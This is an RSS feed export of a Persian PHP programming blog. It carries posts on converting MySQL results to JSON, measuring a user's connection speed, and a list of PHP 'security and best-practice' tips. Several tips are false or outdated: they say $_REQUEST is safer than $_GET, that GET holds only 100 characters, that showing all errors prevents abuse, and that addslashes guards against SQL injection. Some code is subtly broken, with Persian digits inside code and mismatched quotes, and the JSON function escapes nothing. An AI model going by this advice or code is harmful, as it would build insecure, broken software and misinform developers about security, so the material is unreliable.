<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>پادشاه فلش &#187; پی اچ پی</title>
	<atom:link href="http://blog.iflashlord.com/category/%d8%a8%d8%b1%d9%86%d8%a7%d9%85%d9%87-%d9%86%d9%88%db%8c%d8%b3%db%8c/%d9%be%db%8c-%d8%a7%da%86-%d9%be%db%8c/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.iflashlord.com</link>
	<description>دست نوشته های یک پادشاه فلش</description>
	<lastBuildDate>Sat, 31 Jul 2010 05:55:09 +0000</lastBuildDate>
	<language>fa</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>تبدیل mysql به json به صورت مستقیم</title>
		<link>http://blog.iflashlord.com/1388/07/%d8%aa%d8%a8%d8%af%db%8c%d9%84-mysql-%d8%a8%d9%87-json-%d8%a8%d9%87-%d8%b5%d9%88%d8%b1%d8%aa-%d9%85%d8%b3%d8%aa%d9%82%db%8c%d9%85/</link>
		<comments>http://blog.iflashlord.com/1388/07/%d8%aa%d8%a8%d8%af%db%8c%d9%84-mysql-%d8%a8%d9%87-json-%d8%a8%d9%87-%d8%b5%d9%88%d8%b1%d8%aa-%d9%85%d8%b3%d8%aa%d9%82%db%8c%d9%85/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 20:39:27 +0000</pubDate>
		<dc:creator>بهروز پولادرگ</dc:creator>
				<category><![CDATA[برنامه نویسی]]></category>
		<category><![CDATA[پی اچ پی]]></category>

		<guid isPermaLink="false">http://blog.iflashlord.com/?p=87</guid>
		<description><![CDATA[خوب این بار به تابعی می پردازیم که به صورت مستقیم نتیجه query مربوطه به Mysql ما را به Json تبدیل می کند ؛ حتما دوستانی که تکنولوژی های جدید سر روکار دارند (مثل آژاکس) به ارزش Json و کاربرد آن در جاوا اسکریپت و پشتیبانی از آن در فریم ورکهای قدرتمند و&#8230; واقف هستند [...]]]></description>
			<content:encoded><![CDATA[<p>خوب این بار به تابعی می پردازیم که به صورت مستقیم نتیجه query مربوطه به Mysql ما را به <a title="درباره json بیشتر بدانید" href="http://uk2.php.net/json" target="_blank">Json</a> تبدیل می کند ؛ حتما دوستانی که تکنولوژی های جدید سر روکار دارند (مثل آژاکس) به ارزش Json و کاربرد آن در جاوا اسکریپت و پشتیبانی از آن در فریم ورکهای قدرتمند و&#8230; واقف هستند ، در این مثال تابعی ایجاد شده که این عمل در آن ایجاد شده ، البته در نسخه های پی اچ پی ۵.۲+ امکان تبدیل سریع با تابع json_encode ایجاد شده که کار را ساده تر کرده است ، البته در این تابع از آن استفاده نشده است و همین موضوع میتواند نکته خوبی باشد برای آشنایی بیشتر شما با ساختار Json و نحوه ایجاد خروجی آن.<br />
نکته دیگر آن که شما از این روش برای ارتباط با فلش هم می توانید استفاده کنید ، زیرا کلاس هایی (Class) برای اکشن اسکریپت در نسخه های مختلف نوشته شده که به درستی و با سرعت بالا خروجی های JSON را پشتبانی می کند که انشاء الله در مقالات آینده به طور مفصل به این بحث خواهیم پرداخت.</p>
<p><span id="more-87"></span></p>
<p>تابع تبدیل مستقیم مای اس کیو ال به جی سان :</p>
<pre class="brush: php;">
function mysql2json($mysql_result,$name){
$json=&quot;{\n\&quot;$name\&quot;: [\n&quot;;
$field_names = array();
$fields = mysql_num_fields($mysql_result);
for($x=0;$x&lt;$fields;$x++){
$field_name = mysql_fetch_field($mysql_result, $x);
if($field_name){
$field_names[$x]=$field_name-&gt;name;
}
}
$rows = mysql_num_rows($mysql_result);
for($x=0;$x&lt;$rows;$x++){
$row = mysql_fetch_array($mysql_result);
$json.=&quot;{\n&quot;;
for($y=0;$y&lt;count($field_names);$y++) {
$json.=&quot;\&quot;$field_names[$y]\&quot; :    \&quot;$row[$y]\&quot;&quot;;
if($y==count($field_names)-1){
$json.=&quot;\n&quot;;
}
else{
$json.=&quot;,\n&quot;;
}
}
if($x==$rows-1){
$json.=&quot;\n}\n&quot;;
}
else{
$json.=&quot;\n},\n&quot;;
}
}
$json.=&quot;]\n};&quot;;
return($json);
}
</pre>
<p>کد استفاده شده ساده می باشد ، تنها کافیست شما چند خروجی از دیتابیس خود با query های مختلف بگیرید تا با نتیجه و ساختار تابع به درستی آشنا شوید.<br />
<span style="color: #808080;"><em>تابع از </em></span><a href="http://www.emanueleferonato.com/2009/09/23/mysql-to-json-with-php" target="_blank"><span style="color: #808080;"><em>امانوئل فرونتو</em></span></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.iflashlord.com/1388/07/%d8%aa%d8%a8%d8%af%db%8c%d9%84-mysql-%d8%a8%d9%87-json-%d8%a8%d9%87-%d8%b5%d9%88%d8%b1%d8%aa-%d9%85%d8%b3%d8%aa%d9%82%db%8c%d9%85/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>محاسبه سرعت اینترنت با پی اچ پی</title>
		<link>http://blog.iflashlord.com/1388/07/%d9%85%d8%ad%d8%a7%d8%b3%d8%a8%d9%87-%d8%b3%d8%b1%d8%b9%d8%aa-%d8%a7%db%8c%d9%86%d8%aa%d8%b1%d9%86%d8%aa-%d8%a8%d8%a7-%d9%be%db%8c-%d8%a7%da%86-%d9%be%db%8c/</link>
		<comments>http://blog.iflashlord.com/1388/07/%d9%85%d8%ad%d8%a7%d8%b3%d8%a8%d9%87-%d8%b3%d8%b1%d8%b9%d8%aa-%d8%a7%db%8c%d9%86%d8%aa%d8%b1%d9%86%d8%aa-%d8%a8%d8%a7-%d9%be%db%8c-%d8%a7%da%86-%d9%be%db%8c/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 20:39:46 +0000</pubDate>
		<dc:creator>بهروز پولادرگ</dc:creator>
				<category><![CDATA[برنامه نویسی]]></category>
		<category><![CDATA[پی اچ پی]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[سرعت اینترنت]]></category>

		<guid isPermaLink="false">http://blog.iflashlord.com/?p=77</guid>
		<description><![CDATA[سلام خدمت دوستان عزیز ، این بار هم  یک مقاله کوتاه و مفید  ،  یکی از کدهای که بسیار کمیاب می باشد و در اینترنت به سختی پیدا می شود ، کد محاسبه سرعت اینترنت می باشد (مثلا n  کیلوبایت در ثانیه) ، که البته روشهای زیادی برای این کار وجود دارد ، در این [...]]]></description>
			<content:encoded><![CDATA[<p>سلام خدمت دوستان عزیز ، این بار هم  یک مقاله کوتاه و مفید  ،  یکی از کدهای که بسیار کمیاب می باشد و در اینترنت به سختی پیدا می شود ، کد محاسبه سرعت اینترنت می باشد (مثلا n  کیلوبایت در ثانیه) ، که البته روشهای زیادی برای این کار وجود دارد ، در این مقاله می خواهیم یک روش خوب با پی اچ پی رو معرفی کنیم ، که به راحتی بتوانید سرعت اینترنت کاربر خودتان رو بدست بیاورید ، این که بدانید سرعت اینترنت هر کاربرها چقدر می باشد علاوه بر این که به صورت عادی برای نمایش این گزینه مفید می باشد ، می تواند روشی باشد تا شما محتوای با کیفیت بالا را برای کاربران باسرعت بالا  و با کیفیت پایین تر را برای دیگر کاربران به نمایش بگزارید و دیگر به روشهای سنتی مجبور نباشید با دو دکمه و انتخاب دستی ، کاربر این کار را انجام دهید و یا اگر مایل هستید از دکمه ها هم استفاده کنید با این کد می توانید به کاربران پر سرعت اعلام کنید که سرعت شما برای بخش با کیفیت مناسب می باشد و&#8230; به هر حال این مواردی که ذکر کردم ، تعدادی از موارد استفاده است که شما میتوانید نسبت به پروژه خودتون از این کد به صورتهای مختلف استفاده کنید.</p>
<p>و حالا کد :</p>
<p><!-- pre {direction:ltr;} --></p>
<pre class="brush: php;">
&lt;?php
$kb=512;
echo &quot;streaming $kb Kb...&lt;!-&quot;;
flush();
$time = explode(&quot; &quot;,microtime());
$start = $time[0] + $time[1];
for($x=0;$x&lt;$kb;$x++){
echo str_pad('', 1024, '.');
flush();
}
$time = explode(&quot; &quot;,microtime());
$finish = $time[0] + $time[1];
$deltat = $finish - $start;
echo &quot;-&gt; Test finished in $deltat seconds. Your speed is &quot;. round($kb / $deltat, 3).&quot;Kb/s&quot;;
?&gt;
</pre>
<p>و حالا در ادامه کد را  خط به خط تحلیل می کنیم :</p>
<p><span id="more-77"></span></p>
<p><strong>خط ۲  : </strong>در این خط ما مقداری را تعریف می کنیم که این مقدار برای تست سرعت استفاده می شود (به کیلو بایت) شما می توانید توسط GET و POST این مقدار را تعیین نمایید تا بتوانید در کد خود هر زمان این مقدار را تعیین نمایید.<br />
<strong>خط ۳ :</strong> این خط برای نمایش شروع کار می باشد و اصلا برای کد لازم نیست و فقط برای نمایش شروع تست در مثال استفاده شده است.<br />
<strong>خط ۴ : </strong>شروع عملیات Flush (<a title="تابع Flush" href="http://www.php.net/flush" target="_blank"> درباره تابع Flush می توانید در اینجا بخوانید</a>)<br />
<strong>خط ۵ :</strong> ذخیره زمان شروع در متغییر $time<br />
<strong>خط ۶ :</strong> تعریف $start به وسیله مقدار های $time<br />
<strong>خط ۷ تا ۱۰  : </strong>با مقدار $kb تعریف شده اطلاعات ایجاد می کنیم و دوباره ّمush را اجرا می کنید ، این عمل به تعداد $kb تکرار می شود ، در کل در هر بار به مقدار ۱۰۲۴ بایت پد ایجاد می شود که معادل ۱ کیلو بایت می باشد. و عمل کش  انجام می شود.<br />
<strong>خط ۱۱ :</strong> دوباره زمان را ذخیره می کنیم .<br />
<strong>خط ۱۲-۱۳  :</strong> تفاوت بین شروع و پاین به هنگام سازی ها را بدست می آوریم.<br />
<strong>خط ۱۴ :</strong> مقدار نهایی را بدست می آوریم و گرد می کنیم و با متن مروبطه نمایش می دهیم ( که شما می توانید از این مقدار برای شروط استفاده کنید و در حالت های مختلف سرعت نتیجه های مختلفی را نمایش دهید)</p>
<p>خوب ، تمام شد ، به همین راحتی بود <img src='http://blog.iflashlord.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>باید به این نکته توجه داشته باشید هر چه عدد ۵۱۲ (که در ابتدای کد استفاده شد) بزرگتر باشد ، می بایست نتیجه دقیق تری از سرعت بدست بیاورید ولی زمان بیشتر هم برای اجرای کد صرف خواهد شد</p>
<p>و در بعضی از تنظیمات پی اچ پی output buffering روی On تنظیم شده این باعث می شود که پی اچ پی قبل از هدرها و کوکی ها و &#8230;(به جز جابه جایی اطلاعات) اجرا شود و این باعث می شود زمان به درستی محاسبه نشود ، با قرار دادن این گذینه روی Off و در واقع غیر فعال کردن output buffering می توانید به مقداری واقعی تر دست پیدا کنید.</p>
<p><a href="http://www.triquitips.com/timetest.php" target="_blank">شما می توانید یک مثال را در اینجا مشاهده نمایید</a></p>
<p>با آروزی موفقیت و پیروزی روز افزون .</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.iflashlord.com/1388/07/%d9%85%d8%ad%d8%a7%d8%b3%d8%a8%d9%87-%d8%b3%d8%b1%d8%b9%d8%aa-%d8%a7%db%8c%d9%86%d8%aa%d8%b1%d9%86%d8%aa-%d8%a8%d8%a7-%d9%be%db%8c-%d8%a7%da%86-%d9%be%db%8c/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>۴۸ نکته و اصل مهم در برنامه نویسی پی اچ پی</title>
		<link>http://blog.iflashlord.com/1387/12/%d9%86%da%a9%d8%a7%d8%aa-%d8%a7%d8%b5%d9%88%d9%84-%d9%85%d9%87%d9%85-%d8%a8%d8%b1%d9%86%d8%a7%d9%85%d9%87-%d9%86%d9%88%db%8c%d8%b3%db%8c/</link>
		<comments>http://blog.iflashlord.com/1387/12/%d9%86%da%a9%d8%a7%d8%aa-%d8%a7%d8%b5%d9%88%d9%84-%d9%85%d9%87%d9%85-%d8%a8%d8%b1%d9%86%d8%a7%d9%85%d9%87-%d9%86%d9%88%db%8c%d8%b3%db%8c/#comments</comments>
		<pubDate>Sun, 08 Mar 2009 05:12:32 +0000</pubDate>
		<dc:creator>بهروز پولادرگ</dc:creator>
				<category><![CDATA[برنامه نویسی]]></category>
		<category><![CDATA[پی اچ پی]]></category>

		<guid isPermaLink="false">http://174.142.91.140/~iflashlo/blog/?p=9</guid>
		<description><![CDATA[به نام آن خدایی که نام او راحت روح است و پیغام او مفتاح فتوح است و سلام او در وقت صباح مؤمنان را صبوح است و ذکر او مرهم دل مجروح است و مهر او بلا نشینان را کشتی نوح است. این مطلب از مجوعه ای از مباحثی که در انجمن مجید آنلاین پیرامون [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: right;">به نام آن خدایی که نام او راحت روح است و پیغام او مفتاح فتوح است و سلام او در وقت صباح مؤمنان را صبوح است و ذکر او مرهم دل مجروح است و مهر او بلا نشینان را کشتی نوح است.</p>
<p style="text-align: center;"><img class="alignnone size-medium wp-image-279" title="php" src="http://blog.iflashlord.com/wp-content/uploads/2009/03/php-300x157.png" alt="" width="300" height="157" /></p>
<p><span style="color: #808080;">این مطلب از مجوعه ای از مباحثی که در انجمن مجید آنلاین پیرامون <em>نکات و اصول مهم در برنامه نویسی پی اچ پی</em> نوشته شده است در اینجا جمع آوری شده است ( با تشکر از Y.PY عزیز و دیگر دوستان انجمن)</span></p>
<p><strong><span style="color: #808080;">۱</span></strong>- هرگز فایل های ضمیمه شده رو با پسوند inc. ذخیره نکنید! یعنی name.class.inc رو به name.class.php تغییر بدید. و یا از .HTAccess برای سطح دسترسی inc. استفاده کنید.</p>
<p><strong><span style="color: #808080;">۲</span></strong>- حتاًالمکان تگ های اضافی و فضا های خالی را حذف کنید و از باز و بسته کردن بیش از حد تگهای سرور (&lt;?php ?&gt; &lt;? ?&gt; &lt;?= ?&gt;) خودداری کنید. در عمل تفاوتی ندارند ولی در حجم و سرعت، به ازای هر ۱ کاراکتر اضافی ۱ بایت حجم فایل و صفحه و Loading میبره بالا(مخصوصاً در پروژه های سنگین)!</p>
<p><strong><span style="color: #808080;">۳</span></strong>-<strong><span style="color: darkgreen;"> </span></strong>کلاس های خود را با قرار دادن ; کامل ببندید و کلاس را با Final و Initialize/__construct شروع کنید تا Clone نشوند:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 130px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;">final class </span><span style="color: #0000bb;">Name<br />
</span><span style="color: #007700;">{<br />
final public function </span><span style="color: #0000bb;">__construct</span><span style="color: #007700;">()<br />
{<br />
</span><span style="color: #ff8000;">#…<br />
</span><span style="color: #007700;">}<br />
};<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">۴</span></strong>- برای Escape کردن کاراکترهای ویژه و <strong>جلوگیری از خیلی از حملات SQL</strong> از دستورات زیر استفاده کنید:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 98px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> </span></code></code><code style="white-space: nowrap;"><code><span style="color: #000000;"><span style="color: #0000bb;">get_magic_quotes_gpc </span><span style="color: #007700;">? </span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">= @</span><span style="color: #0000bb;">stripslashes</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">) : </span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">= @</span><span style="color: #0000bb;">addslashes</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">);if(</p>
<p></span><span style="color: #0000bb;">function_exists</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘mysql_real_escape_string’</span><span style="color: #007700;">)): @</span><span style="color: #0000bb;">mysql_real_escape_string</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">);<br />
else: @</span><span style="color: #0000bb;">mysql_escape_string</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">);<br />
endif; </span></span></code></code><code style="white-space: nowrap;"><code><span style="color: #000000;"><span style="color: #007700;"> </span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">5</span></strong>-<strong><span style="color: darkgreen;"> </span></strong>در کلاس خود از تابع پیش فرض<strong> clone__ </strong>برای جلوگیری از تقلید(Clone)(شبیه سازی) توابع استفاده کنید:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 82px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;">final public function </span><span style="color: #0000bb;">__clone</span><span style="color: #007700;">()<br />
{<br />
return(@exit(</span><span style="color: #dd0000;">‘Cloning is not allowed.’</span><span style="color: #007700;">));<br />
}<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">۶</span></strong>-<strong><span style="color: darkgreen;"> </span></strong>هرگز از Cookie/Session برای ذخیره کلمه رمز یا مقادیر نمایشی استفاده نکنید(قابل تغییر هستند). خیلی ها از جمله … این مورد رو در نرم افزارشون رعایت نمی کنند و بارها آسیب های جدی و پیش پا افتاده ای رو متحمل میشن.</p>
<p><span id="more-9"></span></p>
<p><span id="more-405"> </span><strong><span style="color: #808080;">۷</span></strong>-<strong><span style="color: darkgreen;"> </span></strong>در خط اول هر فایل PHP، بعد از خطا زدایی کامل صفحه، دستور (error_reporting(E_ALL@ را قرار بدید که تمامی خطا ها و هشدار ها رو نمایش بده. تا از سو استفاده های احتمالی جلوگیری بشه.</p>
<p><strong><span style="color: #808080;">۸</span></strong>-<strong><span style="color: darkgreen;"> </span></strong>حتاًامکان از دستور GET_$ برای دریافت مقادیر استفاده نکنید. و به جاش از دستور REQUEST_$ استفاده کنید(مقدارش رو هم فیلتر کنید).<br />
مقادیر متد GET_$، <strong><span style="color: darkred;">براحتی قابل Sniff و Steal هستند</span></strong>. همچنین ظرفیت این متد حداکثر ۱۰۰ کاراکتر هستش و تمام پارامترهای URL رو هم نوار آدرس مرورگر در معرض دید میزاره.<br />
ولی متد REQUEST_$، هیچ کدوم از این ضعف ها رو نداره و قدرت پیمایشش هم بیشتره.<br />
اینم یه مثال ساده برای معتبر سازیش:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 34px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #0000bb;">$Int_Identity</span><span style="color: #007700;">= (int)@</span><span style="color: #0000bb;">preg_replace</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘/[^۰-۹]/i’</span><span style="color: #007700;">, </span><span style="color: #dd0000;">”</span><span style="color: #007700;">, </span><span style="color: #0000bb;">$_REQUEST</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'Id'</span><span style="color: #007700;">]);<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><!-- / message --> <!-- sig --></p>
<p><strong><span style="color: #808080;">9</span></strong>-  <strong> </strong>حتماً تمامی دستورات Exit و Die رو با Ignore کردن خطا <strong>@</strong> و بستن محتوا استفاده کنید:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 34px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;">@exit(</span><span style="color: #dd0000;">”</span><span style="color: #007700;">); </span><span style="color: #0000bb;">یا </span><span style="color: #007700;">@die(</span><span style="color: #dd0000;">”</span><span style="color: #007700;">);<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">۱۰</span></strong>-  <strong> </strong>در اول هر کلاس و تابع حتماً وجود و بودن کلاس و تابع رو چک کنید!</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 146px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;">if(!</span><span style="color: #0000bb;">extension_loaded</span><span style="color: #007700;">(</span><span style="color: #dd0000;">’standard’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Extension Standard not loaded!’</span><span style="color: #007700;">);<br />
elseif(!</span><span style="color: #0000bb;">extension_loaded</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘mysql’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Extension MySQL not loaded!’</span><span style="color: #007700;">);<br />
elseif(!</span><span style="color: #0000bb;">class_exists</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘ClassName’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Class ClassName not exists!’</span><span style="color: #007700;">);<br />
endif;<br />
…<br />
if(</span><span style="color: #0000bb;">function_exists</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘mysql_real_escape_string’</span><span style="color: #007700;">)): @</span><span style="color: #0000bb;">mysql_real_escape_string</span><span style="color: #007700;">(…);<br />
else: @</span><span style="color: #0000bb;">mysql_escape_string</span><span style="color: #007700;">(…);<br />
endif;<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">11</span></strong>-  <strong> </strong><span style="color: darkred;">هرگز از روش زیر برای آدرس دهی(Action) استفاده نکنید:</span></p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 66px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> &lt;form name=”Frm_Test” action=”<span style="color: #0000bb;">&lt;?= $_Server</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'PHP_Self'</span><span style="color: #007700;">] </span><span style="color: #0000bb;">?&gt;</span>“ method=”post” target=”_self”&gt;<br />
…<br />
&lt;/form&gt;</span> </code><!-- php buffer end --> </code></div>
</div>
<p>چراکه قابل تغییر و دستکاری هستند(برای حملات (XSS(Cross Side Scripting).<br />
راه حل:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 50px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #0000bb;">$_PHPSelf</span><span style="color: #007700;">= @</span><span style="color: #0000bb;">basename</span><span style="color: #007700;">(</span><span style="color: #0000bb;">__File__</span><span style="color: #007700;">);<br />
</span><span style="color: #0000bb;">$_Server</span><span style="color: #007700;">[</span><span style="color: #dd0000;">'PHP_Self]= @substr($_Server['</span><span style="color: #0000bb;">PHP_Self</span><span style="color: #dd0000;">'], ۰, @strpos($_Server['</span><span style="color: #0000bb;">PHP_Self</span><span style="color: #007700;">], </span><span style="color: #0000bb;">$_PHPSelf</span><span style="color: #007700;">)) . </span><span style="color: #0000bb;">$_PHPSelf</span><span style="color: #007700;">;<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">12</span></strong>-  <strong> </strong>حتماً تمامی خروجی ها رو به نوع مربوطش تبدیل کنید:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 98px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;">echo((string)</span><span style="color: #dd0000;">‘Test ’ </span><span style="color: #007700;">. </span><span style="color: #0000bb;">$_Var_Test</span><span style="color: #007700;">);return((string)</p>
<p></span><span style="color: #0000bb;">$_Str_Test</span><span style="color: #007700;">);return((integer)</p>
<p></span><span style="color: #0000bb;">$_Int_Test</span><span style="color: #007700;">);<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">13</span></strong>-  و در آخر، بهتر و ایمن تره اگر تمامی تگ ها و بلاک ها رو کامل مشخص کنید و کامل ببندید:<br />
حافظه هم دچار مشکل نمیشه.</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 498px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;"><code style="white-space: nowrap;"><code><span style="color: #000000;"><span style="color: #007700;">if(…): …<br />
endif;<br />
if(…): …<br />
else(…): …<br />
endif;if(…): …<br />
elseif(…): …<br />
else(…): …<br />
endif;</p>
<p>if(…)<br />
{<br />
…<br />
};</p>
<p>if(…): …<br />
{<br />
…<br />
}<br />
else<br />
{<br />
…<br />
};</p>
<p>while(…):<br />
endwhile;</p>
<p>while(…)<br />
{<br />
};</p>
<p>for…<br />
foreach…<br />
…</p>
<p></span></span></code></code> </span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><span style="color: darkred;"><strong>مجموعه مشخصی از اشتباهات و آسیب ها و ضعف های نرم افزاری غالباً تکراری رخ می دهند! </strong></span><br />
که چیزی جز خجالت و خسارت بدنبال نداره. و این آخر جهل و نادانی رو میرسونه. اگر یه سری به SecurityFocus.com/archive، MilW0rm.com، Net-Security و غیره برنید متوجه این موضوع میشید. پس <strong>اگر برنامه نویس هستید</strong>، حتماً از آخرین رویداد ها و اخبار امنیتی نرم افزارها مطلع باشید.</p>
<p><strong> </strong><br />
<span style="color: #808080;"><strong> </strong></span><strong><span style="color: #808080;">۱۴</span></strong>- هرگز از SQLite برای <strong>نرم افزارهای سنگین</strong> استفاده نکنید!<br />
شاید SQLite نقات قوت زیادی داشته باشه(<span style="color: darkgreen;">از جمله مستقل بودن</span>)، ولی در رابطه با نرم افزارهای سبک!<br />
در نرم افزارهای سنگین،<br />
<strong>اولیش:</strong> عدم نیاز به پردازش سرور! در ظاهر یه نقطه قوت هست، ولی نداشتن پردازش سرور، مجموعه ای از مشکلات بزرگ و خطرناکی رو بهمراه داره: از قبیل قفل فایل، مسایل همزمانی، مشکلات حافظه، نداشتن کش Query، مشکلات باینری، مشکلات سرریز شدن(Overflow) داده های سنگین و مشکلات مقیاسی هنگام برخورد با توده عظیمی از اطلاعات!<br />
<strong>دومیش: </strong>باینری نا امن! SQLite اطلاعات باینری رو نمیتونه Handle کنه. برای Insert کردن داده از نوع باینری، ابتدا باید آنرا Encode کنید. بهمین شکل باید تا آخر، پس از یک Select، داده رو هی Encode/Decode کنید!<br />
<strong>سومیش: </strong>همه جداول را قفل می کنه!<img title="Shocked" src="http://forum.majidonline.com/majidonline/smiley_new/majidonline_shocked.gif" border="0" alt="" /> اکثر پایگاه های داده جداول انفرادی(یا حتی سطر ها) رو در حین انجام عملیات قفل می کنند، اما SQLite خفنه و بخاطر کاربردش، همه پایگاه داده رو در حین عملیات قفل میکنه . که این Read/Write همزمان رو بسیار کند میکنه! و مشکلات عمده و بزرگ دیگه ای از این قبیل رو بهمراش میاره!<br />
<strong><span style="color: red;">پس هرگز از SQLite برای نرم افزار های سنگین(با داده های سنگین) استفاده نکنید!</span></strong></p>
<p><strong><span style="color: #808080;">۱۵</span></strong>- <span style="color: #808080;"><strong><span style="color: deepskyblue;"> </span></strong></span><strong> </strong>***** بعد از هر بار استفاده از متغیرها، آرایه ها، شی ها، کلاس ها و غیره… اگر دیگر مقدار آنرا آدرسی دهی نمی کنید اون رو خنثی(یا آزاد) کنید. با این کار سرعت عمل حافظه و پردازش اطلاعات و امنیت اطلاعات رو بالا می برید(این امر در مورد دیگر زبانهای برنامه نویسی هم صدق می کنه).<br />
در PHP:</p>
<p><span style="font-size: small;">با دستور <strong>()unset</strong>.</span></p>
<p>مخصوصاً درخواستهای HTTP رو! مثل</p>
<div dir="ltr"><strong><span style="color: red;">$_GET</span></strong>, <strong><span style="color: purple;">$_POST</span></strong>, <strong><span style="color: darkgreen;">$_REQUEST</span></strong></div>
<p>. این طوری از Steal و Sniff کردن مقادیرشون هم جلوگیری میشه(تا حد زیادی).</p>
<p><strong><span style="color: #808080;">۱۶</span></strong>- اگر به قاعده های توابع موجود در بسته <strong>PCRE</strong> مسلط نیستید یا به صحت قواعدتون شک دارید برای فیلتر کردن ورودیها/خروجیها استفاده نکنید. اینها توابعی بسیار دقیق در عین حال خیلی حساس هستند. از توابع خود بسته Standard استفاده کنید. <strong><span style="color: darkgreen;">بهینه تر </span></strong>هم هست(اگر نیازی به قواعد ندارید).<br />
